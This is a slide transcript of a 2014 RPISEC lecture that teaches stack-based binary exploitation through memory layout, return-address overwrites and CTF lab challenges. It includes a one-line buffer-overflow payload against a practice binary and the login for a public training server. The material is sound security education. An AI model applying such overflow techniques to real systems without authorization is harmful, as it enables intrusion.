RPISEC lecture notes - Computer Science Department
Download
Report
Transcript RPISEC lecture notes - Computer Science Department
Security & Exploitation
Operating Systems
Fall 2014
RPISEC - 12/01/2014
OS Security
1
whoami
• Markus Gaasedelen
– B.S. Computer Science ’15
• Security Enthusiast
– I like to hack things
• President of RPISEC
– http://rpis.ec
RPISEC - 12/01/2014
OS Security
2
RPISEC
• The Computer Security Club @ RPI
– http://rpis.ec
• The leading authority on campus for any and all things
computer security related
• We compete in hacking competitions known as CTFs
(Capture The Flag) and we’re very good at them
• We teach cool and applicable security skills at our weekly
meetings
– 5-7pm Fridays, DCC 318
RPISEC - 12/01/2014
OS Security
3
CSAW 2014 Finals
RPISEC - 12/01/2014
OS Security
4
CSAW 2014 Finals
RPISEC - 12/01/2014
OS Security
5
CSAW 2014 Awards
RPISEC - 12/01/2014
OS Security
6
let’s get rolling…
WHAT IS SECURITY?
RPISEC - 12/01/2014
OS Security
7
RPISEC - 12/01/2014
OS Security
8
What is Security?
• Security == Hacking
– ‘politically correct’
– Cyber is the buzzword
• Very technical and
rewarding challenges
• Rarely taught or talked
about in school ):
• Many different categories
of security
RPISEC - 12/01/2014
OS Security
9
Categories of Security
•
•
•
•
•
•
•
•
•
•
•
•
•
Cryptography
Web Security
Vulnerability Research
Binary Exploitation
Reverse Engineering
Malware Analysis
Systems Security
Embedded Hardware Hacking
Network Security
Digital Forensics
Physical Security
Pentesting
…
RPISEC - 12/01/2014
OS Security
10
Categories of Security
•
•
•
•
•
•
•
•
•
•
•
•
•
Cryptography
Web Security
Vulnerability Research
Binary Exploitation
Reverse Engineering
Malware Analysis
Systems Security
Embedded Hardware Hacking
Network Security
Digital Forensics
Physical Security
Pentesting
…
RPISEC - 12/01/2014
The kind of stuff I’ll
talk about today (:
OS Security
11
MEMORY CORRUPTION
& BINARY EXPLOITATION
RPISEC - 12/01/2014
OS Security
12
Binary Exploitation
• The simplest definition:
– Leveraging bugs in an executable to cause
unintended, controlled actions by an attacker
• Requires intimate knowledge of the language,
compiler, and the machine
RPISEC - 12/01/2014
OS Security
13
Bugs Are Everywhere
• C is a ‘low level’ language
– Compiles straight to machine code (x86, ARM, etc)
• Very fast
– Very fine control over the machine and memory
• It’s like driving a manual!
– Easy to do stupid things
RPISEC - 12/01/2014
OS Security
14
RPISEC - 12/01/2014
OS Security
15
The Unexciting Languages
• Binary exploitation isn’t really a thing for
managed or scripting languages
– C#, .NET, JavaScript, Lua, Python, etc
• Slower, automate lots of stuff for you
– Driving an automatic
RPISEC - 12/01/2014
OS Security
16
let’s dive right in and try breaking some stuff
WELCOME TO THE WARZONE
RPISEC - 12/01/2014
OS Security
17
warzone.rpis.ec
ssh username/password
intro01:intro01
RPISEC - 12/01/2014
OS Security
18
Getting Started / Tips
• cd /levels
• ./intro01
• In GDB:
– AAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAA
AAAAAAAA
• python –c ‘print “A”*20’
• gdb ./intro01
– run
RPISEC - 12/01/2014
– Info functions
– Info registers
• ir
– disassemble <function>
• disas main
– breakpoint <function>
• b main
– breakpoint * <address>
• b * 0x08048455
OS Security
19
Stack Overview
• The stack is a region of
memory for a program to
maintain function variables
and stuff during execution
• This is main()’s stack
RPISEC - 12/01/2014
------->
OS Security
20
Understanding the Stack
RPISEC - 12/01/2014
OS Security
21
Understanding the Stack
RPISEC - 12/01/2014
OS Security
22
Corrupting the Stack
RPISEC - 12/01/2014
OS Security
23
PWNING the Stack
RPISEC - 12/01/2014
OS Security
24
Endianess
• Endianess – How data is stored in memory
• Modern computers are generally little endian
– ‘little end in’
• Endianess can be confusing, and I don’t want
to get into the details
– 0x41424344 stored as 0x44, 0x43, 0x42, 0x41
– 0xdeadbeef stored as 0xef, 0xbe, 0xad, 0xde
RPISEC - 12/01/2014
OS Security
25
Intro01 Exploit
(python -c 'print "A"*64 + "\xef\xbe\xad\xde"'; cat) | ./intro01
RPISEC - 12/01/2014
OS Security
26
Bend it like Beckham
UNDERSTANDING CONTROL FLOW
RPISEC - 12/01/2014
OS Security
27
Example ELF / EXE in Memory
Runtime Memory
0x00000000 – Start of memory
Libraries (libc)
ELF Executable
0x08048000 – Start of .text Segment
.text segment
.data segment
Heap
Stack
0xbfff0000 – Top of stack
0xFFFFFFFF – End of memory
RPISEC - 12/01/2014
OS Security
28
Example ELF / EXE in Memory
Runtime Memory
Libraries (libc)
ELF Executable
.text segment
Executable code
.text segment
.data segment
Heap
Stack
RPISEC - 12/01/2014
OS Security
29
Example ELF / EXE in Memory
Runtime Memory
Libraries (libc)
ELF Executable
.text segment
Executable code
EIP
.text segment
.data segment
Heap
Stack
RPISEC - 12/01/2014
OS Security
30
Example ELF / EXE in Memory
Runtime Memory
Libraries (libc)
ELF Executable
.text segment
Executable code
EIP
.data segment
.text segment
Heap
Stack
RPISEC - 12/01/2014
OS Security
31
Example ELF / EXE in Memory
Runtime Memory
Libraries (libc)
ELF Executable
.text segment
.data segment
Executable code
EIP
.text segment
Heap
Stack
RPISEC - 12/01/2014
OS Security
32
Example ELF / EXE in Memory
Runtime Memory
Libraries (libc)
ELF Executable
.text segment
.data segment
Executable code
.text segment
EIP
Heap
Stack
RPISEC - 12/01/2014
OS Security
33
Example ELF / EXE in Memory
Runtime Memory
Libraries (libc)
ELF Executable
.text segment
Executable code
.text segment
.data segment
EIP
Heap
Stack
RPISEC - 12/01/2014
OS Security
34
Example ELF / EXE in Memory
Runtime Memory
Libraries (libc)
ELF Executable
.text segment
Executable code
.text segment
.data segment
EIP
Heap
Stack
RPISEC - 12/01/2014
OS Security
35
Example ELF / EXE in Memory
Runtime Memory
Libraries (libc)
EIP
ELF Executable
.text segment
.text segment
.data segment
Heap
Stack
RPISEC - 12/01/2014
OS Security
36
Example ELF / EXE in Memory
Runtime Memory
Libraries (libc)
ELF Executable
.text segment
.text segment
.data segment
EIP
Heap
Stack
RPISEC - 12/01/2014
OS Security
37
Example ELF / EXE in Memory
Runtime Memory
Libraries (libc)
ELF Executable
.text segment
Executable code
.text segment
.data segment
EIP
Heap
Stack
RPISEC - 12/01/2014
OS Security
38
Example ELF / EXE in Memory
Runtime Memory
Libraries (libc)
EIP
ELF Executable
.text segment
.text segment
.data segment
Heap
Stack
RPISEC - 12/01/2014
OS Security
39
How Calling Works
EIP
RPISEC - 12/01/2014
OS Security
40
How Calling Works
EIP
RPISEC - 12/01/2014
OS Security
41
How Calling Works
EIP
…
RPISEC - 12/01/2014
OS Security
42
How Calling Works
EIP
…
RPISEC - 12/01/2014
OS Security
43
How Calling Works
EIP
…
RPISEC - 12/01/2014
OS Security
44
How Calling Works
EIP
RPISEC - 12/01/2014
…
OS Security
45
Returning
…
EIP
RPISEC - 12/01/2014
OS Security
46
Returning
…
EIP
RPISEC - 12/01/2014
OS Security
47
Returning
…
EIP
RPISEC - 12/01/2014
OS Security
48
Returning
…
EIP
RPISEC - 12/01/2014
OS Security
49
Returning
…
EIP
RPISEC - 12/01/2014
OS Security
50
Now that you know how it works …
OWNING CONTROL FLOW
RPISEC - 12/01/2014
OS Security
51
Stack Smashing
EIP
RPISEC - 12/01/2014
…
OS Security
52
Stack Smashing
EIP
RPISEC - 12/01/2014
…
OS Security
53
Stack Smashing
…
EIP
RPISEC - 12/01/2014
OS Security
54
Returning
…
EIP
RPISEC - 12/01/2014
OS Security
55
Returning home
…
EIP
RPISEC - 12/01/2014
SEGFAULT
0x41414141
OS Security
56
RPISEC - 12/01/2014
OS Security
57
“If your program simply segfaulted,
consider yourself lucky.”
-Chuck Stewart
RPISEC - 12/01/2014
OS Security
58
Redirecting Control Flow
…
Overwrite with
a code address
EIP
RPISEC - 12/01/2014
OS Security
59
warzone.rpis.ec
SSH in as intro02
use the password you got from solving intro01
RPISEC - 12/01/2014
OS Security
60
RPISEC - 12/01/2014
OS Security
61
Modern Protections
•
•
•
•
•
•
•
Address Space Layout Randomization (ASLR)
Data Execution Prevention (DEP)
Stack Cookies (Canaries)
Stack Rearrangement
Read Only Relocation (RELRO)
FORTIFY_SOURCE
These only make things harder, not impossible
– Take MBE if you want to know more about these
RPISEC - 12/01/2014
OS Security
62
Those were only educational challenges
LETS TRY SOMETHING REAL(ER)
RPISEC - 12/01/2014
OS Security
63
Courtesy of Goldschmidt
CHATSERVER V3
RPISEC - 12/01/2014
OS Security
64
ChatServer V3
• From NetProg (CSCI-4220)
• 32bit Linux Exploitation
• Vulnerable to a stack smash
– Compiler’s stack cookies save the day
• I’ll be demoing without cookies, not
exploitable otherwise ):
RPISEC - 12/01/2014
OS Security
65
Courtesy of Goldschmidt
CHATSERVER V3 – DEMO
RPISEC - 12/01/2014
OS Security
66
Windows 8.1 Exploitation (x64)
CSAW 2014 LINKS.EXE
RPISEC - 12/01/2014
OS Security
67
links.exe
•
•
•
•
Challenge from the CSAW 2014 CTF Finals
64bit Exploitation on Windows 8.1
Basically all protections are on by default
No source, lots of reversing :0
RPISEC - 12/01/2014
OS Security
68
reversing is tedious
RPISEC - 12/01/2014
OS Security
69
Windows 8.1 Exploitation (x64)
CSAW 2014 LINKS.EXE - DEMO
RPISEC - 12/01/2014
OS Security
70
CSAW 2014 Finals
RPISEC - 12/01/2014
OS Security
71
Wrapping up Binary Exploitation
• You might consider yourself a rockstar programmer, but you
probably know nothing about secure coding practices or
the implications of your mistakes
• Compilers go out of their way to prevent your bugs from
causing catastrophic failure
• Because your program doesn’t appear to segfault or crash,
doesn’t mean it is bug free or without vulnerabilities
• Binary exploitation is nothing like standard software
development - I truly think of it as an art
RPISEC - 12/01/2014
OS Security
72
welcome to the real world
JOB OPPORTUNITIES
RPISEC - 12/01/2014
OS Security
73
…so…many…jobs…
• Typical titles / positions
–
–
–
–
–
–
–
–
–
Information Security Analyst / Engineer
Security Software Engineer
Vulnerability Research Engineer
Web Application Security Engineer
Computer Network Operations
Threat & Incident Response Engineer
Product Security Reverse Engineer
Malware Analyst / Reverse Engineer
…
RPISEC - 12/01/2014
OS Security
74
Entering the Job Market
• There are so few qualified security individuals,
companies are totally starved ):
• Skilled in security & have a B.S. in CS?
– Government, Contractors, FFRDCs
• $70k – $90k+
– Private / Commercial
• $100k – ??
• Anything less and you’re missing out
RPISEC - 12/01/2014
OS Security
75
Coming Soon - Spring 2015
MODERN BINARY EXPLOITATION
RPISEC - 12/01/2014
OS Security
76
Modern Binary Exploitation
• An official class developed by RPISEC
• http://rpis.ec/binexp
• Class cap is raised to 50!
– Thank Goldschmidt & Stewart for getting us an
awesome room that seats 50+, Walker 5113
– General registration re-opens December 8th
• Tuesday/Friday 2-4pm, Spring 2015
• DON’T MISS THIS!
– ZERO guarantee it’ll ever be offered again
RPISEC - 12/01/2014
OS Security
77
Questions?
•
•
•
•
[email protected]
security.cs.rpi.edu/~gaasem
@gaasedelen
irc.rpis.ec 6667
RPISEC - 12/01/2014
OS Security
78